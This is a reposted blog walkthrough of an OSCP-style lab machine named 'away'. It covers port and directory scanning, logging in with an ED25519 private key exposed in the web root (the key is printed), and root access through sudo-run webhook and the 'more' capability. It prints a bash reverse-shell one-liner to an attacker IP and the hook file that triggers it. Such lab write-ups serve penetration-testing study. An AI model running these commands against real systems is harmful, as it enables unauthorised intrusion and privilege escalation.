【OSCP】away

Posted by admin on 2024-04-10 09:31:56

Lab overview

Name: away

Difficulty: medium

Topics: ED25519 private key abuse, sudo webhook privilege escalation and reverse shell, more abuse / privilege escalation

Information gathering

Host discovery

nmap -sn 192.168.1.0/24


Port scan

└─$ nmap -sV -A -p- -Pn -T4 192.168.1.41 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 08:54 +06
Nmap scan report for 192.168.1.41
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 f1:87:03:41:21:12:ef:80:3c:8f:07:2f:8b:3c:6e:2a (RSA)
| 256 5f:f9:ca:19:0d:74:65:2c:97:4a:36:a4:04:7c:9b:bd (ECDSA)
|_ 256 39:a4:b3:38:94:c5:d2:77:07:a1:dd:b4:2f:0a:5a:44 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).

Directory scan

┌──(kali㉿kali)-[~]
└─$ gobuster dir -w pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.41 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.41
[+] Method: GET
[+] Threads: 10
[+] Wordlist: pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.41/index.html (Status: 200) [Size: 247]
Progress: 5095332 / 5095336 (100.00%)
===============================================================
Finished
===============================================================

Gaining access

Information gathering turned up nothing else, so the only place to start is the single page that is served.

https://tailscale.com/learn/generate-ssh-keys
https://wentao.org/post/2021-04-25-upgrad-ssh-key/


Put simply, ED25519 is a more secure algorithm that replaces RSA; it is used to defend against hash collisions.


Let's generate one on Kali and take a look.


This produces a matching public key and private key.


So, could the target be exposing these two files? The hunch was right: it really is. It even hands over the passphrase directly.


Download the private key, log in with it, and we have a foothold.


┌──(kali㉿kali)-[~]
└─$ curl http://192.168.1.41/id_ed25519 -o id_ed
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 484 100 484 0 0 150k 0 --:--:-- --:--:-- --:--:-- 157k

┌──(kali㉿kali)-[~]
└─$ cat id_ed
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABA+GY+qad
MDkU/yMHam3bmdAAAAEAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIIpBfnwSG2XZXFTs
YR6Gg1apA+kuSgdtTkrrhhgskSJfAAAAsAEbt6fRUQfkYGDCdAa/zOBpiUuAV1kGiDs3F1
gD8y+UxeRdz6gQxbHAY53rE25YN+t1bml5GuNMx99CLApAQCMgeePifFV+t2gRnaMEGRnf
4u1RfM20X6rRYdKeQKHwrE5b/m4xgKC5FvKfiGESqirQ2XPWZnOfbcNc+czsut8t8v+zfl
kYo1mO1M4Va9i+OipgnoOJkdNB+mdx2f7YE0lWoHdt/7KVG5eDB90WrJZF
-----END OPENSSH PRIVATE KEY-----

┌──(kali㉿kali)-[~]
└─$ chmod 600 id_ed

┌──(kali㉿kali)-[~]
└─$ ssh tula@192.168.1.41 -i id_ed
Enter passphrase for key 'id_ed':
Linux away 5.10.0-15-amd64 #1 SMP Debian 5.10.120-1 (2022-06-09) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 17 10:28:31 2022 from 192.168.1.51
tula@away:~$
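The key pulled from the web root above prompted for a passphrase when used. As an added example (not code from the original post), the Python below parses only the cleartext header of an openssh-key-v1 file, without decrypting anything, to report the cipher, KDF, key type and whether a passphrase protects the key; this is the first thing to check when such a file turns up on a web server. The key body is the one shown in the session above.

```python
import base64
import struct

# Key file served from the target's web root, copied from the session above.
LEAKED_KEY = """-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABA+GY+qad
MDkU/yMHam3bmdAAAAEAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIIpBfnwSG2XZXFTs
YR6Gg1apA+kuSgdtTkrrhhgskSJfAAAAsAEbt6fRUQfkYGDCdAa/zOBpiUuAV1kGiDs3F1
gD8y+UxeRdz6gQxbHAY53rE25YN+t1bml5GuNMx99CLApAQCMgeePifFV+t2gRnaMEGRnf
4u1RfM20X6rRYdKeQKHwrE5b/m4xgKC5FvKfiGESqirQ2XPWZnOfbcNc+czsut8t8v+zfl
kYo1mO1M4Va9i+OipgnoOJkdNB+mdx2f7YE0lWoHdt/7KVG5eDB90WrJZF
-----END OPENSSH PRIVATE KEY-----"""

MAGIC = b"openssh-key-v1\x00"


def read_string(buf, pos):
    # SSH wire-format string: 4-byte big-endian length followed by the bytes.
    (length,) = struct.unpack(">I", buf[pos:pos + 4])
    return buf[pos + 4:pos + 4 + length], pos + 4 + length


def inspect_openssh_key(pem_text):
    # Parse the cleartext header of an openssh-key-v1 file; nothing is decrypted.
    body = "".join(line for line in pem_text.splitlines() if not line.startswith("-----"))
    buf = base64.b64decode(body)
    if not buf.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 file")
    pos = len(MAGIC)
    cipher, pos = read_string(buf, pos)      # "none" means no passphrase at all
    kdf, pos = read_string(buf, pos)         # "bcrypt" when the key is encrypted
    kdf_opts, pos = read_string(buf, pos)    # string salt + uint32 rounds
    (nkeys,) = struct.unpack(">I", buf[pos:pos + 4])
    pub_blob, pos = read_string(buf, pos + 4)
    priv_blob, pos = read_string(buf, pos)   # encrypted when cipher != "none"
    key_type, _ = read_string(pub_blob, 0)
    rounds = None
    if kdf == b"bcrypt":
        _salt, p = read_string(kdf_opts, 0)
        (rounds,) = struct.unpack(">I", kdf_opts[p:p + 4])
    return {
        "cipher": cipher.decode(),
        "kdf": kdf.decode(),
        "kdf_rounds": rounds,
        "key_type": key_type.decode(),
        "key_count": nkeys,
        "passphrase_protected": cipher != b"none",
        "private_bytes": len(priv_blob),
    }
```

For this key the parser reports aes256-ctr with bcrypt (16 rounds) and an ssh-ed25519 key, so the file is passphrase-protected; a key generated without a passphrase shows cipher and kdf as "none" and is usable by anyone who can fetch it.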

Privilege escalation

There is a lula user on this host; we can try to escalate privileges through sudo.

About webhook:
https://www.redhat.com/en/topics/automation/what-is-a-webhook

webhook is a lightweight incoming webhook server for running shell commands.
Project: https://github.com/adnanh/webhook

We can follow the project's usage instructions and try for a reverse shell.


Write a hook definition, then have it execute the reverse-shell script:

tula@away:/tmp$ cat hooks.json 
[
{
"id": "shell",
"execute-command": "/tmp/shell.sh",
"command-working-directory": "/tmp"
}
]
tula@away:/tmp$ cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.1.76/8889 0>&1

Start webhook; by default it listens on port 9000.

sudo -u lula /usr/bin/webhook -hooks hooks.json -verbose

Finally, request the web endpoint with the hook id, and the reverse shell connects back.


Checking file capabilities shows that more has been granted read permissions:

/usr/sbin/getcap -r / 2>/dev/null


Hey, brute-force the shadow file directly? Not a chance. Naturally, we read the SSH private key directly first.


Got the root flag; a perfect finish.


End


Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】away

Reposted on CN-SEC中文网, original link: http://cn-sec.com/archives/2643637.html
